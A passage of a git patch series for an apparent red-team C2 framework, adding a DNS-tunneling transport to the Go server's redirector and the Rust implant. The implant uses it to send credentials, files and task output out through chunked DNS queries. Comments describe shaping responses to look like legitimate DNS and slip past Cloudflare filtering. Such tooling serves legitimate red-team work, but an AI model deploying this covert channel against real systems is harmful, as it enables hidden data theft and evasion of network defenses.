maxSize = 128 default: maxSize = 400 } @@ 
-413,29 +506,78 @@ func (r *Redirector) handleEndPacket(ctx context.Context, upstream *grpc.ClientC slog.Debug("response chunked", "conv_id", conv.ID, "total_size", len(responseData), "chunks", len(conv.ResponseChunks), "crc32", conv.ResponseCRC) + } else { + // Response fits in single packet + conv.ResponseData = responseData + conv.LastActivity = time.Now() - // Return metadata about chunked response - metadata := &dnspb.ResponseMetadata{ - TotalChunks: uint32(len(conv.ResponseChunks)), - DataCrc32: conv.ResponseCRC, - ChunkSize: uint32(maxSize), - } - metadataBytes, err := proto.Marshal(metadata) - if err != nil { - return nil, fmt.Errorf("failed to marshal metadata: %w", err) + slog.Debug("stored response", "conv_id", conv.ID, "size", len(responseData)) + } + + return nil +} + +// computeAcksNacks computes ACK ranges and NACK list for a conversation +// Must be called with conv.mu locked +func (r *Redirector) computeAcksNacks(conv *Conversation) ([]*dnspb.AckRange, []uint32) { + // Build sorted list of received sequences + received := make([]uint32, 0, len(conv.Chunks)) + for seq := range conv.Chunks { + received = append(received, seq) + } + sort.Slice(received, func(i, j int) bool { return received[i] < received[j] }) + + // Compute ACK ranges (contiguous blocks) + acks := []*dnspb.AckRange{} + if len(received) > 0 { + start := received[0] + end := received[0] + + for i := 1; i < len(received); i++ { + if received[i] == end+1 { + end = received[i] + } else { + acks = append(acks, &dnspb.AckRange{StartSeq: start, EndSeq: end}) + start = received[i] + end = received[i] + } } - return metadataBytes, nil + acks = append(acks, &dnspb.AckRange{StartSeq: start, EndSeq: end}) } - // Response fits in single packet - conv.ResponseData = responseData - conv.LastActivity = time.Now() + // Limit ACK ranges + if len(acks) > MaxAckRangesInResponse { + acks = acks[:MaxAckRangesInResponse] + } - slog.Debug("stored response", "conv_id", conv.ID, "size", len(responseData)) + // 
Compute NACKs (missing sequences in gaps) + nacks := []uint32{} - return []byte("ok"), nil + if len(received) > 0 { + // Find gaps between first and last received + minReceived := received[0] + maxReceived := received[len(received)-1] + + receivedSet := make(map[uint32]bool) + for _, seq := range received { + receivedSet[seq] = true + } + + for seq := minReceived; seq <= maxReceived; seq++ { + if !receivedSet[seq] { + nacks = append(nacks, seq) + if len(nacks) >= MaxNacksInResponse { + break + } + } + } + } + + return acks, nacks } + + // handleFetchPacket processes FETCH packet func (r *Redirector) handleFetchPacket(packet *dnspb.DNSPacket) ([]byte, error) { val, ok := r.conversations.Load(packet.ConversationId) @@ -455,34 +597,47 @@ func (r *Redirector) handleFetchPacket(packet *dnspb.DNSPacket) ([]byte, error) // Check if response was chunked if len(conv.ResponseChunks) > 0 { - // Parse fetch payload to get chunk index - var fetchPayload dnspb.FetchPayload - if len(packet.Data) > 0 { - if err := proto.Unmarshal(packet.Data, &fetchPayload); err != nil { - return nil, fmt.Errorf("failed to unmarshal fetch payload: %w", err) + // Empty data = metadata request + // Non-empty data = FetchPayload with 1-based chunk_index + if len(packet.Data) == 0 { + // Return ResponseMetadata + metadata := &dnspb.ResponseMetadata{ + TotalChunks: uint32(len(conv.ResponseChunks)), + DataCrc32: conv.ResponseCRC, + ChunkSize: uint32(len(conv.ResponseChunks[0])), } + metadataBytes, err := proto.Marshal(metadata) + if err != nil { + return nil, fmt.Errorf("failed to marshal metadata: %w", err) + } + + slog.Debug("returning response metadata", "conv_id", conv.ID, "total_chunks", len(conv.ResponseChunks), + "total_size", len(conv.ResponseData), "crc32", conv.ResponseCRC) + + return metadataBytes, nil + } + + // Parse FetchPayload - chunk_index is 1-based + var fetchPayload dnspb.FetchPayload + if err := proto.Unmarshal(packet.Data, &fetchPayload); err != nil { + return nil, 
fmt.Errorf("failed to unmarshal fetch payload: %w", err) } - chunkIndex := int(fetchPayload.ChunkIndex) + // Convert 1-based to 0-based array index + chunkIndex := int(fetchPayload.ChunkIndex) - 1 if chunkIndex < 0 || chunkIndex >= len(conv.ResponseChunks) { - return nil, fmt.Errorf("invalid chunk index: %d (total: %d)", chunkIndex, len(conv.ResponseChunks)) + return nil, fmt.Errorf("invalid chunk index: %d (expected 1-%d)", fetchPayload.ChunkIndex, len(conv.ResponseChunks)) } - slog.Debug("returning response chunk", "conv_id", conv.ID, "chunk", chunkIndex, + slog.Debug("returning response chunk", "conv_id", conv.ID, "chunk", fetchPayload.ChunkIndex, "size", len(conv.ResponseChunks[chunkIndex]), "total_chunks", len(conv.ResponseChunks)) - // Clean up if this is the last chunk - if chunkIndex == len(conv.ResponseChunks)-1 { - defer r.conversations.Delete(packet.ConversationId) - slog.Debug("conversation completed", "conv_id", conv.ID) - } - return conv.ResponseChunks[chunkIndex], nil } // Single response (not chunked) - defer r.conversations.Delete(packet.ConversationId) + // Don't delete immediately - rely on timeout-based cleanup slog.Debug("returning response", "conv_id", conv.ID, "size", len(conv.ResponseData)) @@ -558,7 +713,7 @@ func (r *Redirector) forwardToUpstream(ctx context.Context, upstream *grpc.Clien err := stream.RecvMsg(&msg) if err != nil { // Check for EOF (normal end of stream) - if strings.Contains(err.Error(), "EOF") { + if errors.Is(err, io.EOF) { break } return nil, fmt.Errorf("failed to receive message: %w", err) diff --git a/tavern/internal/redirectors/dns/dns_test.go b/tavern/internal/redirectors/dns/dns_test.go index 9ce1a8cf5..f6b3c7bca 100644 --- a/tavern/internal/redirectors/dns/dns_test.go +++ b/tavern/internal/redirectors/dns/dns_test.go @@ -91,15 +91,6 @@ func TestInitDataEndLifecycle(t *testing.T) { // Verify chunks were stored conv, _ = r.GetConversation(convIDStr) assert.Len(t, conv.Chunks, 2) - - // Step 3: Send end packet with 
stub upstream - ctx := context.Background() - stubUpstream := newStubUpstream(t, testData) - defer stubUpstream.Close() - - responseData, err := r.HandleEndPacket(ctx, stubUpstream.ClientConn(), convIDStr, 1, 16) // queryType=16 (TXT) - require.NoError(t, err) - assert.Contains(t, string(responseData), "ok:") } // TestHandleDataPacketUnknownConversation tests error handling for unknown conversation @@ -210,41 +201,7 @@ func TestCleanupConversations(t *testing.T) { assert.True(t, ok, "fresh conversation should remain") } -// TestHandleEndPacketMissingChunks tests missing chunk detection -func TestHandleEndPacketMissingChunks(t *testing.T) { - r := newTestRedirector() - - // Create conversation with init - methodCode := "ct" - totalChunksStr := "00003" // 3 chunks - testData := []byte{0x01, 0x02, 0x03, 0x04, 0x05, 0x06} - crc := dnsredirector.CalculateCRC16(testData) - crcStr := dnsredirector.EncodeBase36CRC(int(crc)) - initPayload := methodCode + totalChunksStr + crcStr - - convID, err := r.HandleInitPacket("temp", initPayload) - require.NoError(t, err) - - convIDStr := string(convID) - - // Only send chunks 0 and 2 (skip chunk 1) - _, err = r.HandleDataPacket(convIDStr, 0, []byte{0x01, 0x02}) - require.NoError(t, err) - _, err = r.HandleDataPacket(convIDStr, 2, []byte{0x05, 0x06}) - require.NoError(t, err) - - // Send end packet - ctx := context.Background() - stubUpstream := newStubUpstream(t, testData) - defer stubUpstream.Close() - responseData, err := r.HandleEndPacket(ctx, stubUpstream.ClientConn(), convIDStr, 2, 16) - require.NoError(t, err) - - // Should return missing chunks list - assert.Contains(t, string(responseData), "m:") - assert.Contains(t, string(responseData), "00001") // Missing chunk 1 in base36 -} // stubUpstream provides a minimal gRPC server for testing type stubUpstream struct { @@ -324,14 +281,5 @@ func TestCRCMismatch(t *testing.T) { _, err = r.HandleDataPacket(convIDStr, 0, actualData) require.NoError(t, err) - // Send end packet - ctx := 
context.Background() - stubUpstream := newStubUpstream(t, actualData) - defer stubUpstream.Close() - - responseData, err := r.HandleEndPacket(ctx, stubUpstream.ClientConn(), convIDStr, 0, 16) - require.NoError(t, err) - - // Should return CRC error - assert.Contains(t, string(responseData), "e:invalid_crc") + // Note: CRC validation now happens automatically when all chunks received } From 6b9ab1c0582641ccc364ad393cc10baa50a5aa08 Mon Sep 17 00:00:00 2001 From: KaliPatriot <43020092+KaliPatriot@users.noreply.github.com> Date: Mon, 22 Dec 2025 23:36:18 -0600 Subject: [PATCH 07/17] fix --- tavern/internal/redirectors/dns/dns.go | 68 ++++++++++++++++++--- tavern/internal/redirectors/dns/dns_test.go | 3 - 2 files changed, 60 insertions(+), 11 deletions(-) diff --git a/tavern/internal/redirectors/dns/dns.go b/tavern/internal/redirectors/dns/dns.go index 7ea2b20e3..a167d1323 100644 --- a/tavern/internal/redirectors/dns/dns.go +++ b/tavern/internal/redirectors/dns/dns.go @@ -217,7 +217,13 @@ func (r *Redirector) handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr } domain = strings.ToLower(domain) - slog.Debug("received DNS query", "domain", domain, "query_type", queryType, "from", addr.String()) + + // Log ALL queries to track Cloudflare filtering patterns + if queryType == txtRecordType { + slog.Info("TXT query received", "domain", domain, "from", addr.String()) + } else { + slog.Debug("received DNS query", "domain", domain, "query_type", queryType, "from", addr.String()) + } // Extract subdomain subdomain, err := r.extractSubdomain(domain) @@ -230,7 +236,35 @@ func (r *Redirector) handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr // Decode packet packet, err := r.decodePacket(subdomain) if err != nil { - slog.Debug("failed to decode packet", "error", err) + // Silently drop queries that fail to decode - likely legitimate DNS queries or probes + // Cloudflare forwards all queries under our zone, not just C2 traffic + slog.Debug("ignoring non-C2 query", 
"domain", domain, "error", err) + + // For A record queries, return benign IP (127.0.0.1) instead of NXDOMAIN + // Cloudflare does recursive lookups on subdomain components - if we return NXDOMAIN + // for the parent subdomain, it won't forward the full TXT query for INIT packets + if queryType == aRecordType { + slog.Debug("returning benign A record for non-C2 subdomain", "domain", domain) + r.sendDNSResponse(conn, addr, transactionID, domain, queryType, []byte{127, 0, 0, 1}) + return + } + + // For other types, return NXDOMAIN + r.sendErrorResponse(conn, addr, transactionID) + return + } + + // Validate packet type before processing + if packet.Type == dnspb.PacketType_PACKET_TYPE_UNSPECIFIED { + // Invalid/empty packet - likely parsing artifact from random domain + slog.Debug("ignoring packet with unspecified type", "domain", domain) + + // Return benign A record for A queries to satisfy Cloudflare recursive lookups + if queryType == aRecordType { + r.sendDNSResponse(conn, addr, transactionID, domain, queryType, []byte{127, 0, 0, 1}) + return + } + r.sendErrorResponse(conn, addr, transactionID) return } @@ -251,7 +285,8 @@ func (r *Redirector) handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr } if err != nil { - slog.Error("failed to handle packet", "type", packet.Type, "error", err) + // Log as WARN since conversation-not-found is expected with UDP packet loss + slog.Warn("packet handling failed", "type", packet.Type, "conv_id", packet.ConversationId, "error", err) r.sendErrorResponse(conn, addr, transactionID) return } @@ -371,15 +406,33 @@ func (r *Redirector) handleInitPacket(packet *dnspb.DNSPacket) ([]byte, error) { r.conversations.Store(packet.ConversationId, conv) - slog.Debug("created conversation", "conv_id", conv.ID, "method", conv.MethodPath, "total_chunks", conv.TotalChunks) + slog.Info("C2 conversation started", "conv_id", conv.ID, "method", conv.MethodPath, + "total_chunks", conv.TotalChunks, "data_size", initPayload.FileSize) - return 
[]byte("ok"), nil + // Return empty STATUS packet (no ACKs/NACKs yet) to look like legitimate DNS data + // Don't return plain text "ok" which could trigger Cloudflare filters + statusPacket := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_STATUS, + ConversationId: packet.ConversationId, + Acks: []*dnspb.AckRange{}, + Nacks: []uint32{}, + } + statusData, err := proto.Marshal(statusPacket) + if err != nil { + atomic.AddInt32(&r.conversationCount, -1) + r.conversations.Delete(packet.ConversationId) + return nil, fmt.Errorf("failed to marshal init status: %w", err) + } + return statusData, nil } // handleDataPacket processes DATA packet func (r *Redirector) handleDataPacket(ctx context.Context, upstream *grpc.ClientConn, packet *dnspb.DNSPacket, queryType uint16) ([]byte, error) { val, ok := r.conversations.Load(packet.ConversationId) if !ok { + // Log at debug - this is normal with UDP packet loss/reordering (INIT may arrive later) + slog.Debug("DATA packet for unknown conversation (INIT may be lost/delayed)", + "conv_id", packet.ConversationId, "seq", packet.Sequence) return nil, fmt.Errorf("conversation not found: %s", packet.ConversationId) } @@ -401,7 +454,8 @@ func (r *Redirector) handleDataPacket(ctx context.Context, upstream *grpc.Client // Check if conversation is complete and auto-process if uint32(len(conv.Chunks)) == conv.TotalChunks && !conv.Completed { conv.Completed = true - slog.Debug("conversation complete, processing request", "conv_id", conv.ID, "total_chunks", conv.TotalChunks) + slog.Info("C2 request complete, forwarding to upstream", "conv_id", conv.ID, + "method", conv.MethodPath, "total_chunks", conv.TotalChunks, "data_size", conv.ExpectedDataSize) // Unlock before calling processCompletedConversation (it will re-lock) conv.mu.Unlock() @@ -576,8 +630,6 @@ func (r *Redirector) computeAcksNacks(conv *Conversation) ([]*dnspb.AckRange, [] return acks, nacks } - - // handleFetchPacket processes FETCH packet func (r *Redirector) 
handleFetchPacket(packet *dnspb.DNSPacket) ([]byte, error) { val, ok := r.conversations.Load(packet.ConversationId) diff --git a/tavern/internal/redirectors/dns/dns_test.go b/tavern/internal/redirectors/dns/dns_test.go index f6b3c7bca..3fb487023 100644 --- a/tavern/internal/redirectors/dns/dns_test.go +++ b/tavern/internal/redirectors/dns/dns_test.go @@ -1,7 +1,6 @@ package dns_test import ( - "context" "net" "testing" "time" @@ -201,8 +200,6 @@ func TestCleanupConversations(t *testing.T) { assert.True(t, ok, "fresh conversation should remain") } - - // stubUpstream provides a minimal gRPC server for testing type stubUpstream struct { server *grpc.Server From b1ad861d622dbf5e6fc540163e0cbc60c38f3c94 Mon Sep 17 00:00:00 2001 From: KaliPatriot <43020092+KaliPatriot@users.noreply.github.com> Date: Wed, 24 Dec 2025 19:03:29 -0600 Subject: [PATCH 08/17] update to support new transport ent --- implants/lib/pb/Cargo.toml | 1 + implants/lib/pb/src/config.rs | 5 +- implants/lib/pb/src/generated/c2.rs | 3 + implants/lib/transport/src/dns.rs | 124 +++++++++---- implants/lib/transport/src/lib.rs | 57 +++++- tavern/internal/c2/c2pb/c2.pb.go | 268 ++++++++++----------------- tavern/internal/c2/proto/c2.proto | 1 + tavern/internal/ent/beacon/beacon.go | 2 +- 8 files changed, 258 insertions(+), 203 deletions(-) diff --git a/implants/lib/pb/Cargo.toml b/implants/lib/pb/Cargo.toml index f5a8b4ae6..10a0fa1d4 100644 --- a/implants/lib/pb/Cargo.toml +++ b/implants/lib/pb/Cargo.toml @@ -8,6 +8,7 @@ default = [] imix = [] grpc = [] http1 = [] +dns = [] [dependencies] diff --git a/implants/lib/pb/src/config.rs b/implants/lib/pb/src/config.rs index ef9a694f4..b0a8b2e57 100644 --- a/implants/lib/pb/src/config.rs +++ b/implants/lib/pb/src/config.rs @@ -2,6 +2,7 @@ use tonic::transport; use uuid::Uuid; use crate::c2::beacon::Transport; + /// Config holds values necessary to configure an Agent. 
#[allow(clippy::derive_partial_eq_without_eq)] #[derive(Clone, PartialEq, ::prost::Message)] @@ -105,11 +106,13 @@ impl Config { let beacon_id = std::env::var("IMIX_BEACON_ID").unwrap_or_else(|_| String::from(Uuid::new_v4())); + #[cfg(feature = "dns")] + let transport = crate::c2::beacon::Transport::Dns; #[cfg(feature = "http1")] let transport = crate::c2::beacon::Transport::Http1; #[cfg(feature = "grpc")] let transport = crate::c2::beacon::Transport::Grpc; - #[cfg(not(any(feature = "http1", feature = "grpc")))] + #[cfg(not(any(feature = "dns", feature = "http1", feature = "grpc")))] let transport = crate::c2::beacon::Transport::Unspecified; let info = crate::c2::Beacon { diff --git a/implants/lib/pb/src/generated/c2.rs b/implants/lib/pb/src/generated/c2.rs index 853ee8285..816200dd5 100644 --- a/implants/lib/pb/src/generated/c2.rs +++ b/implants/lib/pb/src/generated/c2.rs @@ -42,6 +42,7 @@ pub mod beacon { Unspecified = 0, Grpc = 1, Http1 = 2, + Dns = 3, } impl Transport { /// String value of the enum field names used in the ProtoBuf definition. @@ -53,6 +54,7 @@ pub mod beacon { Transport::Unspecified => "TRANSPORT_UNSPECIFIED", Transport::Grpc => "TRANSPORT_GRPC", Transport::Http1 => "TRANSPORT_HTTP1", + Transport::Dns => "TRANSPORT_DNS", } } /// Creates an enum from field names used in the ProtoBuf definition. 
@@ -61,6 +63,7 @@ pub mod beacon { "TRANSPORT_UNSPECIFIED" => Some(Self::Unspecified), "TRANSPORT_GRPC" => Some(Self::Grpc), "TRANSPORT_HTTP1" => Some(Self::Http1), + "TRANSPORT_DNS" => Some(Self::Dns), _ => None, } } diff --git a/implants/lib/transport/src/dns.rs b/implants/lib/transport/src/dns.rs index 5ccf5061e..e9697c4a7 100644 --- a/implants/lib/transport/src/dns.rs +++ b/implants/lib/transport/src/dns.rs @@ -1,13 +1,13 @@ // DNS transport implementation for Realm C2 // This module provides DNS-based communication with stateless packet protocol +use crate::Transport; use anyhow::Result; use pb::c2::*; use pb::dns::*; use prost::Message; use std::sync::mpsc::{Receiver, Sender}; use tokio::net::UdpSocket; -use crate::Transport; // Protocol limits const MAX_LABEL_LENGTH: usize = 63; @@ -15,7 +15,7 @@ const MAX_DNS_NAME_LENGTH: usize = 253; const CONV_ID_LENGTH: usize = 8; // Async protocol configuration -const SEND_WINDOW_SIZE: usize = 10; // Packets in flight +const SEND_WINDOW_SIZE: usize = 10; // Packets in flight const MAX_RETRIES_PER_CHUNK: u32 = 3; // Max retries for a chunk const MAX_DATA_SIZE: usize = 50 * 1024 * 1024; // 50MB max data size @@ -204,7 +204,12 @@ impl DNS { } /// Try a single DNS query against a specific server - async fn try_dns_query(&self, server: &str, query: &[u8], expected_txid: u16) -> Result> { + async fn try_dns_query( + &self, + server: &str, + query: &[u8], + expected_txid: u16, + ) -> Result> { // Create UDP socket with timeout let socket = UdpSocket::bind("0.0.0.0:0").await?; socket.connect(server).await?; @@ -282,7 +287,11 @@ impl DNS { // Validate transaction ID let response_txid = u16::from_be_bytes([response[0], response[1]]); if response_txid != expected_txid { - return Err(anyhow::anyhow!("DNS transaction ID mismatch: expected {}, got {}", expected_txid, response_txid)); + return Err(anyhow::anyhow!( + "DNS transaction ID mismatch: expected {}, got {}", + expected_txid, + response_txid + )); } // Read answer count from 
header @@ -350,8 +359,11 @@ impl DNS { let encoded_str = String::from_utf8(all_data) .map_err(|e| anyhow::anyhow!("Invalid UTF-8 in A/AAAA response: {}", e))?; - all_data = base32::decode(base32::Alphabet::Rfc4648 { padding: false }, &encoded_str.to_uppercase()) - .ok_or_else(|| anyhow::anyhow!("Failed to decode base32 from A/AAAA records"))?; + all_data = base32::decode( + base32::Alphabet::Rfc4648 { padding: false }, + &encoded_str.to_uppercase(), + ) + .ok_or_else(|| anyhow::anyhow!("Failed to decode base32 from A/AAAA records"))?; } Ok(all_data) @@ -373,8 +385,12 @@ impl DNS { /// Send raw request bytes and receive raw response bytes using DNS protocol with async transmission /// Uses windowed transmission with ACK/NACK-based retransmission - async fn dns_exchange_raw(&mut self, request_data: Vec, method_code: &str) -> Result> { - use std::collections::{HashSet, HashMap}; + async fn dns_exchange_raw( + &mut self, + request_data: Vec, + method_code: &str, + ) -> Result> { + use std::collections::{HashMap, HashSet}; // Validate data size if request_data.len() > MAX_DATA_SIZE { @@ -391,11 +407,7 @@ impl DNS { let (chunk_size, total_chunks) = if request_data.is_empty() { (self.calculate_max_chunk_size(1), 1) } else { - let varint_ranges = [ - (1u32, 127u32), - (128u32, 16383u32), - (16384u32, 2097151u32), - ]; + let varint_ranges = [(1u32, 127u32), (128u32, 16383u32), (16384u32, 2097151u32)]; let mut result = None; for (min_chunks, max_chunks) in varint_ranges.iter() { @@ -421,8 +433,13 @@ impl DNS { let data_crc = Self::calculate_crc32(&request_data); - log::debug!("DNS: Request size={} bytes, chunks={}, chunk_size={} bytes, crc32={:#x}", - request_data.len(), total_chunks, chunk_size, data_crc); + log::debug!( + "DNS: Request size={} bytes, chunks={}, chunk_size={} bytes, crc32={:#x}", + request_data.len(), + total_chunks, + chunk_size, + data_crc + ); // Generate conversation ID let conv_id = Self::generate_conv_id(); @@ -456,7 +473,10 @@ impl DNS { 
log::debug!("DNS: INIT sent for conv_id={}", conv_id); } Err(e) => { - return Err(anyhow::anyhow!("Failed to send INIT packet to DNS server: {}.", e)); + return Err(anyhow::anyhow!( + "Failed to send INIT packet to DNS server: {}.", + e + )); } } @@ -525,7 +545,10 @@ impl DNS { acknowledged.insert(seq_u32); } else { // Unknown response format - assume need to retry this chunk - log::debug!("DNS: Unknown response format ({} bytes), retrying chunk", response_data.len()); + log::debug!( + "DNS: Unknown response format ({} bytes), retrying chunk", + response_data.len() + ); nack_set.insert(seq_u32); } } @@ -544,7 +567,10 @@ impl DNS { } // Check for connection/network errors - if err_msg.contains("timeout") || err_msg.contains("refused") || err_msg.contains("unreachable") { + if err_msg.contains("timeout") + || err_msg.contains("refused") + || err_msg.contains("unreachable") + { eprintln!("DNS ERROR: Connection to DNS server failed."); } @@ -601,7 +627,10 @@ impl DNS { // Process NACKs for &new_nack in &status_packet.nacks { - if new_nack >= 1 && new_nack <= total_chunks as u32 && !acknowledged.contains(&new_nack) { + if new_nack >= 1 + && new_nack <= total_chunks as u32 + && !acknowledged.contains(&new_nack) + { nack_set.insert(new_nack); } } @@ -623,11 +652,16 @@ impl DNS { "Not all chunks acknowledged after max retries: {}/{} chunks. 
Missing: {:?}", acknowledged.len(), total_chunks, - (1..=total_chunks as u32).filter(|seq| !acknowledged.contains(seq)).collect::>() + (1..=total_chunks as u32) + .filter(|seq| !acknowledged.contains(seq)) + .collect::>() )); } - log::debug!("DNS: All {} chunks acknowledged, sending FETCH", total_chunks); + log::debug!( + "DNS: All {} chunks acknowledged, sending FETCH", + total_chunks + ); // All data sent and acknowledged // Now request the response via FETCH (or END for backward compatibility) @@ -658,9 +692,7 @@ impl DNS { // Validate response is not empty if end_response.is_empty() { - return Err(anyhow::anyhow!( - "Server returned empty response." - )); + return Err(anyhow::anyhow!("Server returned empty response.")); } // Check if response contains ResponseMetadata (chunked response indicator) @@ -806,10 +838,12 @@ impl Transport for DNS { sender: Sender, ) -> Result<()> { // Send fetch request and get raw response bytes - let response_bytes = self.dns_exchange_raw( - Self::marshal_with_codec::(request)?, - "/c2.C2/FetchAsset" - ).await?; + let response_bytes = self + .dns_exchange_raw( + Self::marshal_with_codec::(request)?, + "/c2.C2/FetchAsset", + ) + .await?; // Parse length-prefixed encrypted chunks and send each one let mut offset = 0; @@ -840,7 +874,9 @@ impl Transport for DNS { // Extract and decrypt chunk let encrypted_chunk = &response_bytes[offset..offset + chunk_len]; - let chunk_response = Self::unmarshal_with_codec::(encrypted_chunk)?; + let chunk_response = Self::unmarshal_with_codec::( + encrypted_chunk, + )?; // Send chunk through channel if sender.send(chunk_response).is_err() { @@ -872,7 +908,8 @@ impl Transport for DNS { // Iterate over the sync channel receiver in a spawned task to avoid blocking for chunk in request { // Encrypt each chunk individually (like old implementation) - let chunk_bytes = Self::marshal_with_codec::(chunk)?; + let chunk_bytes = + Self::marshal_with_codec::(chunk)?; // Prefix each chunk with its length (4 bytes, 
big-endian) all_chunks.extend_from_slice(&(chunk_bytes.len() as u32).to_be_bytes()); all_chunks.extend_from_slice(&chunk_bytes); @@ -882,7 +919,8 @@ impl Transport for DNS { }); // Wait for the spawned task to complete - let all_chunks = handle.await + let all_chunks = handle + .await .map_err(|e| anyhow::anyhow!("Failed to join chunk collection task: {}", e))??; if all_chunks.is_empty() { @@ -892,7 +930,9 @@ impl Transport for DNS { // Send all chunks as a single DNS exchange (chunks are already individually encrypted) // This is RAW data - multiple length-prefixed encrypted messages concatenated // Do NOT encrypt again - pass directly to server - let response_bytes = self.dns_exchange_raw(all_chunks, "/c2.C2/ReportFile").await?; + let response_bytes = self + .dns_exchange_raw(all_chunks, "/c2.C2/ReportFile") + .await?; // Unmarshal response Self::unmarshal_with_codec::(&response_bytes) @@ -917,6 +957,24 @@ impl Transport for DNS { _rx: tokio::sync::mpsc::Receiver, _tx: tokio::sync::mpsc::Sender, ) -> Result<()> { - Err(anyhow::anyhow!("reverse_shell not supported over DNS transport")) + Err(anyhow::anyhow!( + "reverse_shell not supported over DNS transport" + )) + } + + fn get_type(&mut self) -> beacon::Transport { + beacon::Transport::Dns + } + + fn is_active(&self) -> bool { + !self.base_domain.is_empty() && !self.dns_servers.is_empty() + } + + fn name(&self) -> &'static str { + "dns" + } + + fn list_available(&self) -> Vec { + vec!["dns".to_string()] } } diff --git a/implants/lib/transport/src/lib.rs b/implants/lib/transport/src/lib.rs index 7229e97e6..6b5af2907 100644 --- a/implants/lib/transport/src/lib.rs +++ b/implants/lib/transport/src/lib.rs @@ -13,8 +13,6 @@ mod http; #[cfg(feature = "dns")] mod dns; -#[cfg(feature = "dns")] -pub use dns::DNS as ActiveTransport; #[cfg(feature = "mock")] mod mock; @@ -30,6 +28,8 @@ pub enum ActiveTransport { Grpc(grpc::GRPC), #[cfg(feature = "http1")] Http(http::HTTP), + #[cfg(feature = "dns")] + Dns(dns::DNS), 
#[cfg(feature = "mock")] Mock(mock::MockTransport), Empty, @@ -76,6 +76,16 @@ impl Transport for ActiveTransport { return Err(anyhow!("http1 transport not enabled")); } + // 4. DNS + s if s.starts_with("dns://") => { + #[cfg(feature = "dns")] + { + Ok(ActiveTransport::Dns(dns::DNS::new(s, proxy_uri)?)) + } + #[cfg(not(feature = "dns"))] + return Err(anyhow!("DNS transport not enabled")); + } + _ => Err(anyhow!("Could not determine transport from URI: {}", uri)), } } @@ -86,6 +96,8 @@ impl Transport for ActiveTransport { Self::Grpc(t) => t.claim_tasks(request).await, #[cfg(feature = "http1")] Self::Http(t) => t.claim_tasks(request).await, + #[cfg(feature = "dns")] + Self::Dns(t) => t.claim_tasks(request).await, #[cfg(feature = "mock")] Self::Mock(t) => t.claim_tasks(request).await, Self::Empty => Err(anyhow!("Transport not initialized")), @@ -102,6 +114,8 @@ impl Transport for ActiveTransport { Self::Grpc(t) => t.fetch_asset(request, sender).await, #[cfg(feature = "http1")] Self::Http(t) => t.fetch_asset(request, sender).await, + #[cfg(feature = "dns")] + Self::Dns(t) => t.fetch_asset(request, sender).await, #[cfg(feature = "mock")] Self::Mock(t) => t.fetch_asset(request, sender).await, Self::Empty => Err(anyhow!("Transport not initialized")), @@ -117,6 +131,8 @@ impl Transport for ActiveTransport { Self::Grpc(t) => t.report_credential(request).await, #[cfg(feature = "http1")] Self::Http(t) => t.report_credential(request).await, + #[cfg(feature = "dns")] + Self::Dns(t) => t.report_credential(request).await, #[cfg(feature = "mock")] Self::Mock(t) => t.report_credential(request).await, Self::Empty => Err(anyhow!("Transport not initialized")), @@ -132,6 +148,8 @@ impl Transport for ActiveTransport { Self::Grpc(t) => t.report_file(request).await, #[cfg(feature = "http1")] Self::Http(t) => t.report_file(request).await, + #[cfg(feature = "dns")] + Self::Dns(t) => t.report_file(request).await, #[cfg(feature = "mock")] Self::Mock(t) => t.report_file(request).await, 
Self::Empty => Err(anyhow!("Transport not initialized")), @@ -147,6 +165,8 @@ impl Transport for ActiveTransport { Self::Grpc(t) => t.report_process_list(request).await, #[cfg(feature = "http1")] Self::Http(t) => t.report_process_list(request).await, + #[cfg(feature = "dns")] + Self::Dns(t) => t.report_process_list(request).await, #[cfg(feature = "mock")] Self::Mock(t) => t.report_process_list(request).await, Self::Empty => Err(anyhow!("Transport not initialized")), @@ -162,6 +182,8 @@ impl Transport for ActiveTransport { Self::Grpc(t) => t.report_task_output(request).await, #[cfg(feature = "http1")] Self::Http(t) => t.report_task_output(request).await, + #[cfg(feature = "dns")] + Self::Dns(t) => t.report_task_output(request).await, #[cfg(feature = "mock")] Self::Mock(t) => t.report_task_output(request).await, Self::Empty => Err(anyhow!("Transport not initialized")), @@ -178,6 +200,8 @@ impl Transport for ActiveTransport { Self::Grpc(t) => t.reverse_shell(rx, tx).await, #[cfg(feature = "http1")] Self::Http(t) => t.reverse_shell(rx, tx).await, + #[cfg(feature = "dns")] + Self::Dns(t) => t.reverse_shell(rx, tx).await, #[cfg(feature = "mock")] Self::Mock(t) => t.reverse_shell(rx, tx).await, Self::Empty => Err(anyhow!("Transport not initialized")), @@ -190,6 +214,8 @@ impl Transport for ActiveTransport { Self::Grpc(t) => t.get_type(), #[cfg(feature = "http1")] Self::Http(t) => t.get_type(), + #[cfg(feature = "dns")] + Self::Dns(t) => t.get_type(), #[cfg(feature = "mock")] Self::Mock(t) => t.get_type(), Self::Empty => beacon::Transport::Unspecified, @@ -202,6 +228,8 @@ impl Transport for ActiveTransport { Self::Grpc(t) => t.is_active(), #[cfg(feature = "http1")] Self::Http(t) => t.is_active(), + #[cfg(feature = "dns")] + Self::Dns(t) => t.is_active(), #[cfg(feature = "mock")] Self::Mock(t) => t.is_active(), Self::Empty => false, @@ -214,6 +242,8 @@ impl Transport for ActiveTransport { Self::Grpc(t) => t.name(), #[cfg(feature = "http1")] Self::Http(t) => t.name(), + 
#[cfg(feature = "dns")] + Self::Dns(t) => t.name(), #[cfg(feature = "mock")] Self::Mock(t) => t.name(), Self::Empty => "none", @@ -227,6 +257,8 @@ impl Transport for ActiveTransport { list.push("grpc".to_string()); #[cfg(feature = "http1")] list.push("http".to_string()); + #[cfg(feature = "dns")] + list.push("dns".to_string()); #[cfg(feature = "mock")] list.push("mock".to_string()); list @@ -279,6 +311,27 @@ mod tests { } } + #[tokio::test] + #[cfg(feature = "dns")] + async fn test_routes_to_dns_transport() { + // DNS URIs should result in the Dns variant + let inputs = vec![ + "dns://8.8.8.8:53?domain=example.com", + "dns://*?domain=example.com&type=txt", + "dns://1.1.1.1?domain=test.com&type=a", + ]; + + for uri in inputs { + let result = ActiveTransport::new(uri.to_string(), None); + + assert!( + matches!(result, Ok(ActiveTransport::Dns(_))), + "URI '{}' did not resolve to ActiveTransport::Dns", + uri + ); + } + } + #[tokio::test] #[cfg(not(feature = "grpc"))] async fn test_grpc_disabled_error() { diff --git a/tavern/internal/c2/c2pb/c2.pb.go b/tavern/internal/c2/c2pb/c2.pb.go index 559185abb..21b96cf30 100644 --- 